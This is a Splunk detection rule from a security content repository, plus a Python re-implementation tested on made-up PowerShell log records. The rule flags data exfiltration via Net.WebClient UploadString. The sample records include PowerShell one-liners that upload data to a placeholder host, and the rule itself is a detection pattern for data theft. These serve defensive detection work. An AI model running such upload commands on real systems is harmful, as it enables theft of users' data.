Language: SPL | License: Apache-2.0 | Source: splunk/security_content

Windows Exfiltration Over C2 Via Powershell UploadString

The following analytic identifies potential data exfiltration using PowerShell's `Net.WebClient` object together with its `UploadString` method. It relies on PowerShell Script Block Logging (EventCode 4104) to detect script blocks in which both terms appear. This activity is significant because it may indicate an attempt to upload sensitive data, such as desktop screenshots or files, to an external or internal URI, a behaviour associated with malware such as Winter-Vivern. If confirmed malicious, this could lead to unauthorized data transfer, compromising sensitive information and potentially enabling further exploitation of the compromised host.

Rule source: detections/endpoint/windows_exfiltration_over_c2_via_powershell_uploadstring.yml
`powershell` EventCode=4104 ScriptBlockText = "*Net.webclient*" AND ScriptBlockText = "*.UploadString*"
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `windows_exfiltration_over_c2_via_powershell_uploadstring_filter`
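To show what the search above matches and how the `stats` aggregation shapes the result, here is an added Python re-implementation of its filter and aggregation run over constructed 4104 records; it is not code from splunk/security_content. It assumes Splunk's case-insensitive wildcard matching on `ScriptBlockText`, reduces the BY clause to `dest` and `user_id`, and does not model the `powershell` source macro or the `_filter` macro.

```python
from collections import defaultdict

# Constructed EventCode=4104 Script Block Logging records (not real telemetry).
# Record 4 is a constructed non-4104 record to show the EventCode gate.
SAMPLE_EVENTS = [
    {"_time": "2024-05-01T09:00:00", "dest": "ws01", "user_id": "alice", "EventCode": 4104,
     "ScriptBlockText": "$w = New-Object Net.WebClient; $w.DownloadString('http://intranet/banner.txt')"},
    {"_time": "2024-05-01T09:05:00", "dest": "ws01", "user_id": "alice", "EventCode": 4104,
     "ScriptBlockText": "$c = New-Object System.Net.WebClient; $c.UploadString('http://example.invalid/up', $data)"},
    {"_time": "2024-05-01T09:07:30", "dest": "ws01", "user_id": "alice", "EventCode": 4104,
     "ScriptBlockText": '(new-object net.webclient).uploadstring("http://example.invalid/x", $b64)'},
    {"_time": "2024-05-01T10:00:00", "dest": "ws02", "user_id": "bob", "EventCode": 4103,
     "ScriptBlockText": "CommandInvocation(Out-String): Net.WebClient .UploadString"},
    {"_time": "2024-05-01T10:15:00", "dest": "ws02", "user_id": "bob", "EventCode": 4104,
     "ScriptBlockText": "Invoke-RestMethod -Uri http://example.invalid -Method Post -Body $x"},
]

def matches_rule(event):
    """Mirror the search filter: EventCode=4104 AND ScriptBlockText matches both
    wildcard terms. Splunk wildcard matching is case-insensitive, so compare lowercased."""
    if event.get("EventCode") != 4104:
        return False
    text = event.get("ScriptBlockText", "").lower()
    return "net.webclient" in text and ".uploadstring" in text

def run_detection(events):
    """Mirror `stats count min(_time) as firstTime max(_time) as lastTime BY dest user_id`.
    _time values are ISO-8601 strings, so string min/max equals chronological min/max."""
    rows = defaultdict(lambda: {"count": 0, "firstTime": None, "lastTime": None})
    for ev in events:
        if not matches_rule(ev):
            continue
        row = rows[(ev["dest"], ev["user_id"])]
        t = ev["_time"]
        row["count"] += 1
        row["firstTime"] = t if row["firstTime"] is None else min(row["firstTime"], t)
        row["lastTime"] = t if row["lastTime"] is None else max(row["lastTime"], t)
    return dict(rows)

if __name__ == "__main__":
    for (dest, user), row in run_detection(SAMPLE_EVENTS).items():
        print(f"{dest} {user} count={row['count']} first={row['firstTime']} last={row['lastTime']}")
```

Note that the `Invoke-RestMethod` record is not matched: the search keys on the `Net.WebClient`/`UploadString` pair only, so other upload primitives need their own analytics.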